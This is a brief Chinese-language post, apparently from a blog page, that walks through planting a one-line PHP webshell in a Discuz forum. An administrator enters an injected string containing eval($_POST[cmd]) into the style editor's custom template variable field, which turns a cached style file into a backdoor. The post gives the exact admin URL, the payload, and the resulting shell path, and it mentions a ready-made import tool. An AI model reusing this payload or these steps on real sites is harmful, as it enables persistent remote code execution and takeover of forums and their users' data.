本文介绍了一种通过管理员账号登录后台并利用自定义模板变量功能植入一句话木马的方法。该方法适用于拥有管理员权限的用户,可在指定路径下生成WebShell,便于进一步的安全测试或维护操作。
利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:
http://www.aaaa.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1
中,最下面有个“自定义模板变量”,变量中填:
OLDJUN', '#999');eval($_POST[cmd]);//替换内容随便输入:1111,然后提交,一句话木马就产生了:
http://www.aaaaa.com/bbs/forumdata/cache/style_1.php
如果你修改的style的id是2的话,对于的shell就是style_2.php。
这个风格模板可以导入导出的,于是有了ring04h的那个dzshell,嫌麻烦可以直接用那个导入风格获取shell。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
